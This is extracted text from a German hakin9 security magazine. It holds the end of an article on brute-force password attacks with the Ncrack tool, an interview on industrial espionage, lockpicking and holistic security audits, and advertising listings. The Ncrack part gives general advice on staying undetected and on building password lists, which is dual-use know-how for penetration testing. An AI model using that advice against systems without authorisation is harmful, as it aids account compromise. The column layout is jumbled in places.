starten zu müssen. Dabei können folgenden Buchsta- ten und Fehler in den Anmeldungen zur Tagesgeschäft
ben verwendet werden,ein kleiner Buchstabe bedeutet zählen.
dann die Ausgabe des Programms zu steigern und vice Erstellen Sie sich persönliche Namens- und Pass-
versa. wortlisten. Erstellen Sie Namenslisten anhand von
Informationen die Sie Sammeln konnten. Die Pass-
• v / V – erhöhen oder senken des verbosity Levels wortlisten sollten zusammengestellt werden aus den
• d / D – erhöhen des debugging Levels Namenslisten und Informationen aus dem Internet. Es
• ? - Ausgabe eines Interaktionshilfe-Bildschirms gibt genug Quellen die über bewertete Passwortlis-
ten verfügen, „the common ones“, bzw. aktuelle Listen
Jeder andere Taste – Ausgabe einer Statusmeldung über Standardpasswörter von Netzwerkgeräten verfü-
(vgl. Abbildung 3. ) gen.

Best Practices
Wie bereits weiter oben erwähnt ist ein BruteForce –
Angriff immer ein Versuch ein System mit der Brech-
stange zu knacken. BruteForce bedeutet also eine
Gradwanderung, möglichst viele Versuche innerhalb
kürzester Zeit was Authentifizierung angeht dabei aber
möglichst unsichtbar für die Systeme bleiben die atta-
ckiert werden.
Im voraus, sollten Informationen bzgl. der Netzwer-
kinfrastruktur bzw. der dort angesiedelten Dienste vor-
genommen werden. Hierzu gibt es Tools wie Nmap die
sich in diesem Bereich bereits bewährt haben. Wenn
bekannt ist, dass bestimmte Sicherheitssysteme wie

Im Internet
Nachteile:
• http://nmap.org/
• Es gibt nur eine beschränkte Modulauswahl für Netzwerk- • http://nmap.org/ncrack/
dienste • http://sock-raw.org/papers/openssh_library
• Es gibt lediglich eine frühe Alpha-Version, daher sind Mo- • http://seclists.org/nmap-dev/2010/q4/173
dule gar nicht oder nur unzureichend getestet

Vorteile: CHRISTIAN STOCKHORST


Der Autor beschäftigt sich privat und auch beruflich mit To-
• Kombination mit Nmap XML Output ols der IT – Sicherheit, vor allem Programme die zur Durchfüh-
• Zielspezifikation über Inputfiles, für große Netzwerke
rung von Penetrationsvorgängen genutzt werden können ste-
• Projekt der Nmap-Community
• Optionen ähnlich wie Nmap hen ganz in seinem Blickpunkt. Er arbeitet momentan im Be-
• Modulareransatz für jede Option/Service reich Netzwerktechnik, IT - Sicherheit und Client-/Serverso-
• Open Source Programm, Quellcode, ftware bei der KDT GmbH.
Kontakt mit dem Autor: Christian@Stockhorst.biz

42 11/2010
Was erwartet Sie in diesem Kurs:
Die Wiederherstellung verlorener Passwörter
Das Abfangen von Informationen in lokalen Netzwerken
Das Abfangen von verschlüsselten Daten
Angriff auf eine SSL-Sitzung
Backdoor - die "Hintertür" als Tor zum System
Dateien und Verzeichnisse mit Hilfe des Kernels 2.6 verstecken
Angriffe
Angri vom Typ Buffer-Overflow
Angriffe vom Typ Heap-Overflow
Format-String-Angriffe
Das Überschreiben des Datenstrom-Zeigers (File Stream Pointer Overwrite)
Fehler im Systemkernel
Die Verwendung des ICMP-Protokolls aus der Sicht des Hackers
Identifizierung eines Netzwerkcomputers
Netfilter im Dienste der Systemsicherheit
Systemsiche
Absichern des Betriebssystems Schritt für Schritt
Sicherheitsscanner
Kernelpatches zur Erhöhung der Sicherheit
Intrusion Detection System (IDS)
Angriff mit Hilfe eines Webservers
Shellcode-Erstellung in der Win32-Umgebung

72888
INTERVIEW

„Zu aller erst sollte man


sich seiner Situation, seiner
schutzwürdigen Interessen und
seiner Risiken bewusst sein.“
Interview mit Thomas Hackner
hakin9: Hallo Herr Hackner, es freut mich, dass Sie Die Schadenssummen reichen dabei von unter 20.000
noch einmal Zeit gefunden haben, um sich über das Euro bis hin zu über 1,5 Millionen Euro. Hochgerechnet
Thema Industrie- und Wirtschaftsspionage mit uns würde dies einen jährlichen Schaden von zirka 880 Millio-
zu unterhalten. Gerade in Zeiten der Wirtschaftskrise nen Euro allein Österreich bedeuten. Die Dunkelziffer wird
und verstärkten Konkurrenzdruck, den wir in einigen auch hier wesentlich höher geschätzt.
Wirtschaftsbereichen deutlich erkennen können, steigt
das Risiko Opfer eines solchen Angriffes zu werden. Wie hakin9: Was sind die Hauptursachen für erfolgreiche
sehen Sie die Entwicklung in diesem Bereich? Angriffe? Wo sehen Sie noch Nachholbedarf für
Thomas Hackner: Es freut mich ebenfalls, mit Ihnen Unternehmen?
noch einmal ins Gespräch zu kommen. Die Situation in Thomas Hackner: Wie aus Berichten hervorgeht, lässt
Österreich ist speziell. Wir stellen durch unsere geopoli- sich zirka die Hälfte aller Fälle auf Informationsabfluss
tisch zentrale Lage einen interessanten Knotenpunkt für durch Mitarbeiter, entweder jene, die das Unternehmen
viele Nachrichtendienste dar. Die Anzahl an diplomati- verlassen, aber auch Aktive, zurückführen. Ein nicht
schen Vertretungen und Nachrichtendienstoffizieren in- unbeträchtliches Risiko stellen zudem Kooperations-
ternationaler Organisationen ist überproportional hoch, partner und der Informationsaustausch mit diesen dar.
so geht es aus dem Verfassungsschutzbericht 2010 des Richtet man sich nach diesen Punkten, so fehlt es hier
Bundesministeriums für Inneres hervor. Interessanter- an Überprüfungen der Mitarbeiter bereits beim Einstel-
weise gab es keine nachvollziehbaren Auswirkungen lungsgespräch, internen Sicherheitsmaßnahmen und
der Wirtschaftskrise auf die Anzahl der Spionagefälle in -richtlinien, welche den Informationsfluss im Unterneh-
Österreich. Dennoch gilt es wachsam zu sein, die Dun- men und nach Außen regeln, und am Bewusstsein der
kelziffer an Vorfällen der Industriespionage dürfte ent- Unternehmen und dessen Mitarbeitern.
sprechend hoch sein und sowohl kleine, als auch große
Firmen betreffen. Das Risiko durch Wirtschaftsspiona-
ge ist durch den regen Verkehr an Nachrichtendiensten
ebenfalls nicht zu unterschätzen.

hakin9: Sie sprechen von einer Dunkelziffer, gibt es


denn Zahlen, denen man Glauben schenken kann?
Thomas Hackner: Leider gibt es keine offiziellen Zahlen,
die den wahrscheinlich durchgeführten Angriffen auch nur
Nahe kommen. Zum einen liegt es in der Natur der Sa-
che, dass derartige Angriffe nicht erkannt werden sollen
und zum anderen werden identifizierte Vorfälle nur selten
gemeldet. Allerdings wurde 2010 eine Studie über die Be-
troffenheit der österreichischen Unternehmen durch Wirt-
schafts- und Industriespionage veröffentlicht. Durchgeführt
wurde diese vom FH Campus Wien in Zusammenarbeit
mit dem Bundesamt für Verfassungsschutz und Terroris-
musbekämpfung des BMI. Aus dieser Studie geht inte-
ressanterweise hervor, dass 31 % der befragten Unter-
nehmen bereits Opfer eines derartigen Angriffes wurden.

44 1/2011
Interview mit Thomas Hackner

hakin9: Wie kann nun ein Unternehmen wissen, ob nen, Know-How, Kundenlisten, aber auch bestimmte Pro-
es betroffen ist und welche Maßnahmen sind in solch duktionsmaschinen sein. Anschließend wird versucht die
einem Fall zu setzen? Gefährdungslage zu klären und darauf aufbauend, die
Thomas Hackner: Wir sehen leider, dass die Unterneh- passendste Vorgehensweise für die folgende Sicherheits-
mensgröße keinen Effekt auf das Risiko angegriffen zu überprüfung zu wählen. Es kann sein, dass es vernünftiger
werden hat. Jedes Unternehmen besitzt USPs, die es ist, verschiedene Phasen zu definieren, in denen schrittwei-
von seinen Konkurrenten abhebt, oder seine Marktpositi- se und unabhängig voneinander Überprüfungen der IT-Si-
on stärkt. Dies können spezielle Abläufe im Unternehmen, cherheit, physische Tests und Social Engineering Angriffe
billige Herstellung, qualitativ hochwertige Produktion, aber durchgeführt werden. Wichtig wäre dabei, dass ein Koor-
auch gute Verträge mit Kunden und Beziehungen zu Lie- dinator hinter diesen Tests steht, der die Ergebnisse der
feranten sein. Die Frage, die vor allem Unternehmen zur einzelnen Phasen im Ganzen versteht und in ein Gesamt-
illegalen Konkurrenzanalyse bewegt, ist – warum kaufen konzept vereinen kann. Wird dies im Zuge eines Projek-
die Kunden bei meiner Konkurrenz und wie kann ich sie tes mit einem Anbieter ganzheitlicher Sicherheitsüberprü-
überzeugen bei mir zu kaufen?. Und dies macht jedes er- fungen durchgeführt, ist dies ohnehin der Fall. Wurden die
folgreiche Unternehmen zum möglichen Ziel. einzelnen Bereiche nach ihrer Überprüfung abgesichert, so
Jedes Unternehmen sollte sich bewusst machen, was können diese in einem Abschlusstest auf ihre letzte Probe
seine Kernkompetenzen sind und worin es sich von sei- gestellt werden. Auch für diesen Test muss detailliert festge-
nen Mitbewerbern unterscheidet. Dies werden mit hoher legt werden, welche Assets Ziel des Angriffes sind – ist es
Wahrscheinlichkeit auch jene Bereiche sein, die es ver- beispielsweise das Entwenden eines Dokuments, der Ein-
stärkt zu schützen gilt. Geschützt werden können diese bruch in ein Computersystem oder der Beweis in den Ser-
nur durch ein Sicherheitskonzept, das sowohl IT, Personal verraum zu gelangen. Dies wird in einer Sitzung mit dem
und Geschäftslokalitäten vereint. Es ist wichtig alle diese Geschäftsführer festgelegt, sodass niemand im operativen
Aspekte in die eigene Sicherheitsstrategie zu integrieren. Betrieb von der bevorstehenden Überprüfung weiß. Zudem
Wird ein Bereich außen vor gelassen, so wird mit hoher werden Techniken und Handlungsspielraum der Tester defi-
Wahrscheinlichkeit gerade dieser von potentiellen Angrei- niert. Sind alle Formalitäten geklärt, erfolgt die abschließen-
fern zur Durchführung ihres Planes ausgewählt werden. de Überprüfung, die das Unternehmen einer quasi realen
Investitionen zur Absicherung in den beiden anderen Be- Attacke durch versierte Angreifer aussetzt. Dabei sind die
reichen konnten dann nur teilweise ihre Wirkung zeigen Tester dazu angehalten alle ihre Kenntnisse und Tools ein-
und den Angriff leider nicht verhindern. Doch sollte man zusetzen und die implementierten Sicherheitsmaßnahmen
sich nicht entmutigen lassen, man kann sich diesem Ziel in allen drei vorher genannten Bereichen auf ihre Wirksam-
Schritt für Schritt nähern und mit dem richtigen Einsatz an keit im Anlassfall zu testen. Dieses Audit nennt sich auch Ti-
Mitteln oft bereits durch relativ kostengünstige Maßnah- ger Team Assessment und ist die einzige Möglichkeit, mehr
men die Sicherheit für das eigene Unternehmen erhöhen. über die effektive Sicherheit des Unternehmens im Ernst-
fall zu erfahren und noch vorhandene Schwachstellen im
hakin9: Angenommen ein Unternehmer würde nun Gesamtkonzept zu erkennen. Dieses Assessment wird je-
auf Sie zukommen und um Hilfe bitten, was wären doch nicht nur am Ende eines eben beschriebenen Projek-
die ersten Schritte, die sie dem Unternehmer raten tes mit mehreren Phasen durchgeführt, sondern kann auch
würden? zur ersten schnellen Erhebung der größten Schwachpunk-
Thomas Hackner: Zu aller erst sollte man sich seiner te in einem Unternehmen eingesetzt werden. So stellt es
Situation, seiner schutzwürdigen Interessen und seiner eine kostengünstige Möglichkeit dar, sich einen Überblick
Risiken bewusst sein. Für Risikoanalysen möchte ich über den Ist-Stand der Umsetzung der gesamten Sicher-
an dieser Stelle auf bewährte Vorgehensweisen, wie heitsstrategie zu verschaffen und Mängel bereits frühzeitig
beispielsweise ISO 27005 oder NIST SP 800-30, ver- zu identifizieren.
weisen. Für die Ermittlung des Ist-Standes der Sicher-
heit im Unternehmen und der Wirksamkeit der bisher hakin9: Die Durchführung von IT-Penetration Tests
eingesetzten Mittel, möchte ich zur Durchführung eines und Social Engineering Audits wird in Europa bereits
ganzheitlichen Sicherheitsaudits raten. In diesen wer- von einigen Firmen angeboten. Sie führen neben
den sowohl physische und personelle, als auch die IT- diesen beiden Überprüfungen jedoch auch physische
Sicherheitsmaßnahmen auf ihre Effektivität und ihr Vor- Sicherheitsaudits durch, und führen diese in dem
handensein hin überprüft. von Ihnen beschriebenen ganzheitlichen Konzept
zusammen. Wie sind Sie dazu gekommen und woher
hakin9: Wie läuft ein ganzheitliches Sicherheitsaudit ab? haben Sie Ihre Kenntnisse?
Thomas Hackner: In einem initialen Workshop werden Thomas Hackner: Es liegt bereits einige Jahre zurück,
mit dem Kunden gemeinsam die wertvollsten Assets in dass ich begonnen habe mich mit der zerstörungsfrei-
seinem Unternehmen erarbeitet. Dies können Informatio- en Öffnung von Schließzylindern zu beschäftigen. Ich

hakin9.org/de 45
INTERVIEW

kaufte damals mein erstes Pickset und ein Schloss im Jedermann zur Verfügung zu stellen, da auf diese Weise
Baumark und verbrachte eine knappe Stunde damit, es mehr Menschen erreicht werden können. Die nun veröf-
zu öffnen. Damals hatte ich noch nicht das Gespür und fentlichten Beiträge zeigen Fehler auf, die bei der Umset-
das Verständnis für die Vorgänge während des Pickens, zung von Sicherheitsmaßnahmen passieren können und
doch wenn nach einer Stunde, in der man mit dem Pick- sollen zum einen Sicherheitsbeauftragte auf mögliche
werkzeug im Dunkeln tastet, das Schloss plötzlich öffnet, Fehler aufmerksam machen und bei all jenen, die sich
erlebt man einen sehr zufriedenstellenden Augenblick. noch nicht mit der Thematik auseinander gesetzt haben,
Die darauf folgenden Öffnungsversuche gingen dann mit Bewusstsein schaffen. Das Projekt ist nicht auf physische
10 und 5 Minuten bereits um Einiges schneller. Heute Sicherheit beschränkt, wir haben auch Geschichten aus
benötige ich für das gleiche Schloss 1 bis 3 Sekunden. dem Social Engineering-Bereich, sowie Code-Beispiele
Diese Öffnung damals war genug Motivation, mich mit aus der IT. Die Geschichten und Bilder sind frei verfügbar
der Thematik näher zu beschäftigen und so gründete ich und können von jedem verwendet werden. Und vielleicht
den österreichischen Lockpicking-Verein OpenLocks.at, hilft es ja auch dem ein oder anderen Security Consul-
den wir seit August mit einer Gruppe engangierter Picker tant dabei, Awareness beim Kunden zu schaffen. Mitar-
als offiziellen Sportverein führen. Durch Kontakte im Be- beit ist nicht nur möglich, sondern auch erwünscht. Wir
reich der Schloss- und Tresoröffnung, den Besuch von sind stark davon abhängig, dass uns Leser ihre Beiträge
Weiterbildungsseminaren und vor allem laufende prak- und Erlebnisse per Mail zusenden. Bilder und Beiträge
tische Trainings erweiterte sich mein Wissensgebiet von werden anschließend anonymisiert und der Öffentlichkeit
der zerstörungsfreien Schlossöffnung zur physischen zum freien Gedanken- und Meinungsaustausch zur Ver-
Absicherung von Unternehmen. Meine Ausbildung und fügung gestellt.
praktische Erfahrung davor war hauptsächlich auf IT-
Sicherheit, die Durchführung von IT Penetration Tests hakin9: Was dürfen wir in Zukunft von Ihnen
und IT Security Management Systemen ausgerichtet. erwarten?
Es war naheliegend, dass man mit IT Penetration Tests Thomas Hackner: Das Jahr 2011 wird ein sehr spannen-
nur einen Teilaspekt der Unternehmens- und Informati- des Jahr. Zum einen bieten wir mit HACKNER Security In-
onssicherheit abdeckt. Physische Sicherheit ist bereits in telligence erstmals ganzheitliche Sicherheitspakete für jede
wichtigen IT-Security Management Standards, wie ISO Unternehmensgröße an und werden Unternehmen dabei
27001 oder NIST SP 800-30, ein Thema, wird aber aus unterstützen, physische Sicherheit mit dem Thema Social
IT-Sicht etwas vernachlässigt. IT-Sicherheitsbeauftragte Engineering und IT-Sicherheit in Einklang zu bringen. Hier
sind im Bereich der physischen Sicherheit oft nicht ge- erwarten uns sicher viele spannende Projekte und Sicher-
schult, ein direkter Verantwortlicher für physische Sicher- heitsaudits. OpenLocks.at ist bereits in den Bundesländern
heit fehlt oder es besteht nur eingeschränkt Kommunika- Oberösterreich und Wien vertreten, wo wir monatliche Tref-
tion zwischen beiden Bereichen. Mein Ziel ist es, diese fen veranstalten, bei denen jeder herzlichst eingeladen ist,
Welten miteinander zu verknüpfen und einen umfassen- vorbei zu kommen. Wir freuen uns über jeden neuen be-
deren Ansatz zur Informationssicherheit zu liefern. geisterten Lockpicker und eine erste österreichische Meis-
terschaft der zerstörungsfreien Schlossöffnung wäre ein
hakin9: Sie beteiligen sich ja nicht nur aktiv am guter Schritt, den Lockpicking-Sport auch hier weiter voran
Lockpicking-Verein OpenLocks sondern haben auch zu treiben. SecurityPitfalls.org ist ein sehr Community-ori-
das Projekt SecurityPitfalls.org ins Leben gerufen, mit entiertes Projekt, wir freuen uns also auch hier über jeden,
dem Ziel Bewusstsein für Sicherheit zu schaffen. Wie der uns neue Bilder oder Stories schickt. Mit HACKNER
ist dies entstanden und kann jeder daran mitarbeiten? Security Intelligence arbeiten wir eng in Forschung und
Thomas Hackner: (lacht) Sie haben sich im Vorfeld gut Projektarbeit mit Universitäten und Forschungseinrichtun-
informiert. Entstanden ist dies eher durch Zufall, als ich gen zusammen und auch hier wird es im Jahr 2011 erste
mit meinem geschätzten Freund Aljosha Judmayer ei- interessante Publikationen geben.
nen Vortrag auf einer Konferenz über das Umgehen von
physischen Sicherheitsmechanismen halten sollte. Wir hakin9: Wir bedanken uns sehr herzlich für das
machten dazu einen Streifzug durch Wien und fanden Gespräch!
wirklich viele interessant Beispiele, auch von sehr nam- Thomas Hackner: Die Freude liegt ganz auf meiner
haften Firmen, die zwar klar ersichtlich Sicherheitsmaß- Seite.
nahmen getroffen hatten, diese aber völlig falsch um- Geführt wurde dieses Interview mit Thomas Hackner, dem Ge-
setzten und damit neue Lücken öffneten. Wir begannen schäftsführer von HACKNER Security Intelligence. Für weitere Fra-
also diese Situationen zu fotografieren und zu sammeln gen oder Diskussionen ist er unter der E-Mail Adresse t.hackner@
und so entstand eine kleine Beispielgallerie an Sicher- hackner-security.com bzw. über die Webseite http://www.hackner-se-
heitslücken. Irgendwann kam ich jedoch auf die Idee, curity.com zu erreichen.
diese Sammlung im Internet zu veröffentlichen und für

46 1/2011
Recommended Sites

Datenschutz ist EU-weit gesetzliche Anforde- Die Netzwerktechnik steht auf www.easy-ne- Die Seed Forensics GmbH bietet für Strafver-
rung. Wir sorgen für die Erfüllung rechtlicher twork.de im Mittelpunkt. Artikel, Tutorials und folgungsbehörden professionelle Unterstützung
Vorschriften und kümmern uns um ein ange- ein Forum bieten genügen Stoff für kommende in den Bereichen der Datensicherstellung und
messenes Datenschutzniveau in Ihrem Unter- Administratoren und Netzwerkprofis. Datenträgerauswertung. Selbstverständlich
nehmen, auch international. entsprechen unsere Mitarbeiter, unser tech-
www.blossey-partner.de www.easy-network.de nisches Equipment und auch unsere Räumli-
chkeiten den notwendigen Anforderungen.
www.seed-forensics.de

Securitymanager.de ist eine Produktion des Happy-Security ist ein neues Portal mit Secu- Hier findest Du alles, was das Herz eines
Online-Verlag FEiG & PARTNER. Seit dem rity-Challanges, IT-Quiz, Web-Bibliothek, Multi- Computerfreaks höher schlagen lässt: Geek
Start hat sich Securitymanager.de zu einem media-Center & vielen weiteren Features. Wear mit intelligenten Sprüchen, eine riesige
führenden Online-Informationsportal in www.happy-security.de Auswahl Gadgets und natürlich auch viele
Deutschland entwickelt und versteht sich als Hacker Tools.
unabhängiger Informationsdienstleister der www.getDigital.de
IT- und Information-Security-Branche.
www.securitymanager.de

CloudSafe stellt seinen Nutzern eine Plattform AV-Comparatives geht hervor aus dem Inns-
zur kryptographisch sicheren Ablage und Verwal- brucker Kompetenzzentrum und gilt als eines
Pericom base camp IT-Security: Unser Ziel ist
tung von sensiblen Daten zur Verfügung: Nutzer der bekanntesten unabhängigen Testhäuser
es, unsere Kunden vor möglichen Gefahren
können auf CloudSafe beliebig viele Dokumente für Antiviren-Software.
für Ihre IT-Infrastruktur bestmöglich zu schüt-
zen. Neben der Analyse von Risikopotentia-
in virtuellen Safes ablegen. Es können weite- www.av-comparatives.org
ren Personen individuelle Zugriffsrechte auf die
len durch Security Audits bieten wir, durch
Safes eingeräumt und somit ein sicherer Daten-
die Implementierung von Security-Lösungen,
austausch ermöglicht werden.
Schutz vor konkreten Gefahren.
www.cloudsafe.com
www.pericom.at

Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: de@hakin9.org


Recommended Companies

Mabunta secXtreme GmbH


Die mabunta GmbH agiert als hoch- schützt Ihre Web-Anwendungen bis
spezialisierter und kompetenter Partner auf Applikationsebene. Dazu gehört
rund um IT-Security- und Netzwerk-Lö- sowohl die Prüfung von Applikationen
sungen. Wir unterstützen bei IT-Sicher- (Pentests und Code-Reviews) als auch
heitsfragen in allen Unternehmens- Beratungsleistungen für Sicherheit im
bereichen, verbinden Wachstum mit Entwicklungsprozess und Schutzlö-
sicherer Kommunikation. sungen (Web Application Firewalls) bei
Alles in allem- mabunta „one-face-to- Großunternehmen und dem gehobenen
the-customer“, Ihr Spezialist in Fragen Mittelstand.
der IT-Sicherheit.
www.sec-Xtreme.com
www.mabunta.de

B1 Systems
SEC Consult Die B1 Systems ist international tätig
SEC Consult ist der führende Berater
SEC Consult für Information Security Consulting in
in den Bereichen Linux/Open Source
Consulting, Training und Support. B1
Zentraleuropa. Die vollständige Unab-
Systems spezialisiert sich in den Be-
hängigkeit von SW- und HW-Herstellern
reichen Virtualisierung und Cluster.
macht uns zum echten Advisor unserer
Kunden. Unsere Dienstleistungen umfa-
info@b1-systems.de
ssen externe/interne Sicherheitsaudits,
www.b1-systems.de
(Web-) Applikationssicherheit (ONR 17-
700), Sicherheitsmanagement-Prozesse
(ISO 27001) etc.
www.sec-consult.com

Tele-Consulting GmbH Blossey & Partner


Vom BSI akkreditiertes Prüflabor für IT- Consulting Datenschutzbüro
Sicherheit, hakin9 und c’t Autoren, jah- Datenschutz ist EU-weit gesetzliche An-
relange Erfahrung bei der Durchführung forderung. Wir sorgen für die Erfüllung
von Penetrationstests und Security-Au- rechtlicher Vorschriften und kümmern
dits, eigener Security Scanner „tajanas”, uns um ein angemessenes Daten-
Sicherheitskonzepte, Risikoanalysen, schutzniveau in Ihrem Unternehmen,
IT-Grundschutz-Beratung, 3 lizenzierte auch international. Wir erledigen alle er-
ISO 27001-Auditoren, VoIP-Planung forderlichen Aufgaben, die Fäden behal-
und -Security ten Sie in der Hand. Nutzen Sie unser
Erstberatungsgespräch.
www.tele-consulting.com
www.blossey-partner.de
Recommended Companies

NESEC m-privacy GmbH


NESEC ist Ihr Spezialist für Penetra- IT-Sicherheitslösungen – funktional und
tionstests, Sicherheitsanalysen und einfach zu bedienen!
IT-Security Counsulting. Das NESEC So präsentieren sich die von m-privacy
Pentest-Team unterstützt Sie bei Si- entwickelten TightGate™-Server, z.B.
cherheitsprüfungen Ihrer Netzwerke TightGate™-Pro mit Datenschutz-Gü-
und Webapplikationen sowie bei Sour- tesiegel. Es bietet als erstes System
ce Code Audits. Bei Bedarf optimieren weltweit einen kompletten Schutz vor
wir Ihre Policy, sensibilisieren Ihre Online-Spionage, Online-Razzien und
Mitarbeiter und zertifizieren Ihr Unter- gezielten Angriffen!
nehmen nach ISO 27001.
www.m-privacy.de
www.nesec.de

Seed Forensics GmbH


Die Seed Forensics GmbH bietet OPTIMAbit GmbH
für Strafverfolgungsbehörden profe- Wir sind Spezialisten für Entwicklung
ssionelle Unterstützung in den und Security. Wir sichern Java, .NET
Bereichen der Datensicherstellung und Mobile Applikationen gegen Angriffe
und Datenträgerauswertung. Selbst- externer und interner Art. Unsere Dien-
verständlich entsprechen unsere ste umfassen Audits, Code Reviews,
Mitarbeiter, unser technisches Equip- Penetrationstest, sowie die Erstellung
0ment und auch unsere Räumlichkeiten von Policies. Zusätzlich bieten wir Semi-
den notwendigen Anforderungen. nare zu sicherheitsrelevanten Themen.

www.seed-forensics.de www.optimabit.com

Protea Networks secadm


Protea ist spezialisiert auf IT-Security- secadm ist durchtrainierter Spezialist für
Lösungen: Verschlüsselung, Firewall/ Airbags, ABS und Sicherheitsgurte in der
VPN, Authentifizierung, Content-Filte- IT. Zehn IT-Sicherheitsexperten mit 70
ring, etc. Wir bieten umfassende Bera- Mannjahren Erfahrung beraten, entwi-
tung, Vertrieb von Security-Hard- und ckeln und implementieren IT-Lösungen
Software, Installation und umfangreiche für Kunden weltweit. Der Fokus liegt da-
Dienstleistungen (z. B. Konzeption, Trai- bei auf Themen wie Prozess-Optimierung
nings). Protea setzt auf Lösungen der und Security-Management. Risiko-Analy-
Markt- und Technologieführer und hält se, die Sicherheitsberatung, Auditing, Se-
dafür direkten inhouse-Support bereit. curity-Leitfäden, Software-Entwicklung,
Reporting bis zum Training.
www.proteanetworks.de www.secadm.de

SecureNet GmbH, München underground_8


Als Softwarehaus und Web Application
secure computing gmbh
Security Spezialist bieten wir Expertise
Wir entwickeln und vertreiben securi-
rund um die Sicherheit von Webanwen-
ty appliances für die Bereiche Unified
dungen: Anwendungs-Pentests, Sour-
Threat Management, Traffic Shaping
cecodeanalysen, Secure Coding Gui-
und Antispam. Unsere Lösungen sind
delines, Beratung rund um den Software
hardwarebasiert und werden über Dis-
Develoment Lifecycle. Tools: Application
tributoren, Reseller und Systemintegra-
Firewalls, Application Scanner, Fortify
toren implementiert und vertrieben.
SCA/Defender/Tracer.
www.underground8.com
www.securenet.de
HACKER SIND
ANGRIFFSLUSTIG.
Besuchen Sie die Swiss Cyber Storm 3 Security Konferenz!
12. - 15. Mai 2011, Rapperswil (CH)
Highlights: Cyber Underground Threats - FBI Experiences - Security Researches - Interactive Hacking Lab -
OWASP Training - Forensic Investigations - Hacker Profiling - Advanced Persistent Threats -
Incident Handling - iPhone Hacking - Wargame Challenges - Capture The Flag - Special Events and more!

www.swisscyberstorm.com